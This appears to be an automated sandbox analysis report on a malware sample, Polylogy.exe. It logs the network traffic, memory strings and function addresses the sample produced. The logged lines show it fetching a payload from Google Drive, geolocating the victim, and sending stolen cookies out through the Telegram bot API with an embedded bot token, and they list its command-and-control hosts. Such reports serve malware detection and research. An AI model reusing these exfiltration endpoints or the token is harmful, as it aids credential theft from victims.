            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:52931 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1mnB1B-kmDkD8dPIuQUjraA2liqqVYg21 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1mnB1B-kmDkD8dPIuQUjraA2liqqVYg21&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20and%20Time:%2018/02/2025%20/%2020:20:35%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20468325%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot8099931947:AAE1ESweRA82yXTxOE-G8GWsPBJDgGqE32Y/sendDocument?chat_id=5898096617%0A&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd50c1797da015Host: api.telegram.orgContent-Length: 1279
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 18 Feb 2025 11:37:11 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: Polylogy.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035D92000.00000004.00000800.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000002.4536890444.0000000035E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20a
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8099931947:AAE1ESweRA82yXTxOE-G8GWsPBJDgGqE32Y/sendDocument?chat_id=5898
            Source: Polylogy.exe, 00000004.00000003.3521008389.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000003.3486006657.000000000550B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035E6E000.00000004.00000800.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000002.4536890444.0000000035E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035E6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035E69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: Polylogy.exe, 00000004.00000002.4519186708.0000000005458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: Polylogy.exe, 00000004.00000002.4536039597.0000000034C20000.00000004.00001000.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000002.4519186708.0000000005493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1mnB1B-kmDkD8dPIuQUjraA2liqqVYg21
            Source: Polylogy.exe, 00000004.00000002.4519186708.0000000005493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1mnB1B-kmDkD8dPIuQUjraA2liqqVYg215
            Source: Polylogy.exe, 00000004.00000003.3521008389.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000002.4519186708.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000003.3521008389.00000000054CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: Polylogy.exe, 00000004.00000002.4519186708.0000000005493000.00000004.00000020.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000003.3521008389.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000003.3486006657.000000000550B000.00000004.00000020.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000003.3521008389.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000002.4519186708.00000000054AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1mnB1B-kmDkD8dPIuQUjraA2liqqVYg21&export=download
            Source: Polylogy.exe, 00000004.00000003.3521008389.00000000054CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1mnB1B-kmDkD8dPIuQUjraA2liqqVYg21&export=downloade
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035D92000.00000004.00000800.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000002.4536890444.0000000035D6B000.00000004.00000800.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000002.4536890444.0000000035CFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035CFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035CFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035D92000.00000004.00000800.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000002.4536890444.0000000035D25000.00000004.00000800.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000002.4536890444.0000000035D6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: Polylogy.exe, 00000004.00000003.3521008389.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000003.3486006657.000000000550B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Polylogy.exe, 00000004.00000003.3521008389.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000003.3486006657.000000000550B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: Polylogy.exe, 00000004.00000003.3521008389.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000003.3486006657.000000000550B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: Polylogy.exe, 00000004.00000003.3486006657.000000000550B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: Polylogy.exe, 00000004.00000003.3521008389.00000000054DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.d
            Source: Polylogy.exe, 00000004.00000003.3486006657.000000000550B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035E9F000.00000004.00000800.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000002.4536890444.0000000035E90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035E9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52934
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52932
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52938
            Source: unknownNetwork traffic detected: HTTP traffic on port 52947 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52936
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52931
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52946
            Source: unknownNetwork traffic detected: HTTP traffic on port 52948 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52944
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52928
            Source: unknownNetwork traffic detected: HTTP traffic on port 52929 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52946 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52931 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52947
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52948
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52942
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52940
            Source: unknownNetwork traffic detected: HTTP traffic on port 52938 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52936 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52940 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52942 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52932 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52944 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52929
            Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.5:52928 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.5:52929 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:52947 version: TLS 1.2
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 0_2_00405295 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405295
            Source: C:\Users\user\Desktop\Polylogy.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 0_2_0040331C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040331C
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_0040331C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,4_2_0040331C
            Source: C:\Users\user\Desktop\Polylogy.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 0_2_00404AD20_2_00404AD2
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 0_2_004064F70_2_004064F7
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_00404AD24_2_00404AD2
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_004064F74_2_004064F7
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_052DC4684_2_052DC468
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_052D64984_2_052D6498
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_052DC7384_2_052DC738
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_052D71184_2_052D7118
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_052DC1464_2_052DC146
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_052DA0884_2_052DA088
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_052D53704_2_052D5370
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_052DD2784_2_052DD278
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_052DCCD84_2_052DCCD8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_052DCFAB4_2_052DCFAB
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_052D69A04_2_052D69A0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_052DE9884_2_052DE988
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_052DCA084_2_052DCA08
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_052D3E094_2_052D3E09
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_052DF9614_2_052DF961
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_052DE97B4_2_052DE97B
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_052D29EC4_2_052D29EC
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BA18504_2_38BA1850
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BA94484_2_38BA9448
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BA51484_2_38BA5148
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BA2A904_2_38BA2A90
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BA1FA84_2_38BA1FA8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BA8CB14_2_38BA8CB1
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BAF0804_2_38BAF080
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BAF4D84_2_38BAF4D8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BAF4C84_2_38BAF4C8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BA8CC04_2_38BA8CC0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BAEC284_2_38BAEC28
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BAEC184_2_38BAEC18
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BA00064_2_38BA0006
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BAF0714_2_38BAF071
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BA00404_2_38BA0040
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BA18414_2_38BA1841
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BACDAF4_2_38BACDAF
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BACDC04_2_38BACDC0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BA9D384_2_38BA9D38
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BA51384_2_38BA5138
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BAF9304_2_38BAF930
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BAF9224_2_38BAF922
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BADAB94_2_38BADAB9
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BADAC84_2_38BADAC8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BAD2184_2_38BAD218
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BAD2094_2_38BAD209
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BAD6704_2_38BAD670
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BA96684_2_38BA9668
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BAD6604_2_38BAD660
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BA1F984_2_38BA1F98
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BAE7D04_2_38BAE7D0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BAE7C04_2_38BAE7C0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BA0B304_2_38BA0B30
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BADF204_2_38BADF20
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BA0B204_2_38BA0B20
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BADF114_2_38BADF11
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BAE3784_2_38BAE378
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38BAE3774_2_38BAE377
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9FC184_2_38D9FC18
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D981D04_2_38D981D0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D98FB04_2_38D98FB0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D97B784_2_38D97B78
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D94ED04_2_38D94ED0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D972C84_2_38D972C8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9C0C84_2_38D9C0C8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D94EC24_2_38D94EC2
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9F2F84_2_38D9F2F8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D908F04_2_38D908F0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D922F04_2_38D922F0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9D2F74_2_38D9D2F7
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9F2E74_2_38D9F2E7
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D904984_2_38D90498
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D91E984_2_38D91E98
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D904894_2_38D90489
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D964884_2_38D96488
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D938B84_2_38D938B8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9E0B84_2_38D9E0B8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D972B84_2_38D972B8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9C0B74_2_38D9C0B7
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D91EA84_2_38D91EA8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9E0A74_2_38D9E0A7
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D91A504_2_38D91A50
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D934504_2_38D93450
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9EE574_2_38D9EE57
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D91A414_2_38D91A41
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D900404_2_38D90040
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D94A784_2_38D94A78
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9CE784_2_38D9CE78
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D96E704_2_38D96E70
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D96E724_2_38D96E72
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9EE684_2_38D9EE68
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D934604_2_38D93460
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9CE674_2_38D9CE67
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9DC194_2_38D9DC19
